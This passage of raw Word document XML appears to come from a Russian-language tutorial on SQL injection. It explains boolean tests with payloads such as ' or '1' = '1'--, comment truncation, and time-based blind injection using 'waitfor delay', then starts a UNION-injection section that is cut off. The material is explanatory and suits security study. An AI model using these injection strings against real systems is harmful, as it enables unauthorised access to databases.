    <w:p w:rsidR="00C250C0" w:rsidRPr="00C250C0" w:rsidRDefault="00291342" w:rsidP="008E2951">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C250C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>120</w:t>
      </w:r>
      <w:r w:rsidR="00C250C0" w:rsidRPr="00C250C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>%)'</w:t>
      </w:r>
      <w:r w:rsidR="00C250C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or '1' = '1'--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008322CE" w:rsidRPr="00B73CCD" w:rsidRDefault="00DF708C"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Все те же самые действия можно проделать</w:t>
      </w:r>
      <w:r w:rsidR="008322CE" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, заменив ключевое слово </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008322CE" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008322CE" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> на </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008322CE" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008322CE" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B73CCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> После добавлении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or</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верно(как 1=1), сервер должен вернуть не только строки с значением </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Price</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B73CCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidR="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>120</w:t>
      </w:r>
      <w:r w:rsidR="00B73CCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> но также и все остальные. После добавления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ложно(как 1=2), сервер ничего не должен вернуть так как ключевое слово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подразумевает выполнения обоих условий.</w:t>
      </w:r>
      <w:r w:rsidR="007A32FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Добавлением любых символов к значению </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Price</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007A32FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> можно вызвать и вовсе отсутствие каких-либо результатов либо ошибку на сервере БД.</w:t>
      </w:r>
      <w:r w:rsidR="009F558E" w:rsidRPr="009F558E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> О</w:t>
      </w:r>
      <w:r w:rsidR="009F558E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>шибку или большее количество данных, чем ожидалось, можно вызвать добавлением комментария ("--"</w:t>
      </w:r>
      <w:r w:rsidR="009F558E" w:rsidRPr="009F558E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, "/*"</w:t>
      </w:r>
      <w:r w:rsidR="009F558E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)  или просто отсутствием исходных данных.</w:t>
      </w:r>
      <w:r w:rsidR="007C78D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Комментирование позволяет отключить любые подзапросы или добавочные условия,  ожидающиеся после использования в запросе значения </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Price</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007C78D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009F558E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B73CCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Таким образом, комбинируя выражение запроса с этими ключевыми словами и добавочными условиями</w:t>
      </w:r>
      <w:r w:rsidR="007C78D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00B73CCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C78D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>можно</w:t>
      </w:r>
      <w:r w:rsidR="00B73CCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> определить нестандартное поведение страницы. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008322CE" w:rsidRPr="00742A82" w:rsidRDefault="008322CE"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Если не удаётся распознать </w:t>
      </w:r>
      <w:r w:rsidR="00742A82">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">аномальное поведение, </w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>можно попробовать распознать подверженность sql-инъекциям посредством зависания страницы на некоторое время. Для примера - время зависания будет 10 секунд:</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08117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;waitfor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';waitfor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DF708C"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B73CCD" w:rsidRDefault="00B73CCD" w:rsidP="00B73CCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00782588" w:rsidRDefault="00B73CCD" w:rsidP="009A31ED">
      <w:pPr>
        <w:ind w:firstLine="706"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Процедура </w:t>
      </w:r>
      <w:r w:rsidRPr="00B73CCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>waitfor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B73CCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>delay</w:t>
      </w:r>
      <w:r w:rsidRPr="00B73CCD">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B73CCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'" - Блокирует выполнение пакета, хранимой процедуры или транзакции до наступления указанного времени или интервала времени</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00782588">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Инъ</w:t>
      </w:r>
      <w:r w:rsidR="00742A82">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">екции с использованием процедуры </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00742A82">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>waitfor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00742A82">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00742A82">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>delay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00742A82">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> называются </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00742A82">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Blind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00742A82">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> или слепые </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00742A82">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00742A82">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00782588" w:rsidRPr="00782588">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00782588">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>инъекции</w:t>
      </w:r>
      <w:r w:rsidR="00742A82">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C445E" w:rsidRDefault="006C445E"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F708C" w:rsidRPr="003B32C2" w:rsidRDefault="00DF708C" w:rsidP="00DF708C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w: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FA7AED" w:rsidRDefault="00FA7AED" w:rsidP="009F0170">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F0712A" w:rsidRDefault="00F0712A" w:rsidP="009F0170">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B93410" w:rsidRDefault="00B93410" w:rsidP="00F0712A">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F0712A" w:rsidRDefault="00F0712A" w:rsidP="00F0712A"/>
    <w:p w:rsidR="00B93410" w:rsidRDefault="00B93410" w:rsidP="00B93410">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc420854435"/>
      <w:r w:rsidRPr="009F0170">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Алгоритм внедрения </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F0170">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009F0170">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-кода с помощью </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Union</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F0170">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>оператора</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w:rsidR="00B93410" w:rsidRPr="00F0712A" w:rsidRDefault="00B93410" w:rsidP="00F0712A"/>
    <w:p w:rsidR="003E6B06" w:rsidRPr="003B32C2" w:rsidRDefault="000F43FF"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Рассмотрим с</w:t>
      </w:r>
      <w:r w:rsidR="003E6B06" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ам</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ую</w:t>
      </w:r>
      <w:r w:rsidR="003E6B06" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> распространённ</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ую атаку</w:t>
      </w:r>
      <w:r w:rsidR="001202D9" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> посредством  внедрения</w:t>
      </w:r>
      <w:r w:rsidR="003E6B06" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Union</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00176FF7" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL-</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>инъекции</w:t>
      </w:r>
      <w:r w:rsidR="003E6B06" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DE4481" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E6B06" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Использование </w:t>
      </w:r>
      <w:r w:rsidR="001202D9" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>этой</w:t>
      </w:r>
      <w:r w:rsidR="003E6B06" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> техники основан</w:t>
      </w:r>
      <w:r w:rsidR="001202D9" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">о на применении оператора </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Union</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001202D9" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</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Он </w:t>
      </w:r>
      <w:r w:rsidR="003E6B06" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">позволяет </w:t>
      </w:r>
      <w:r w:rsidR="00DF708C" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>объединить</w:t>
      </w:r>
      <w:r w:rsidR="003E6B06" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> результаты выполнения </w:t>
      </w:r>
      <w:r w:rsidR="001202D9" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">нескольких </w:t>
      </w:r>
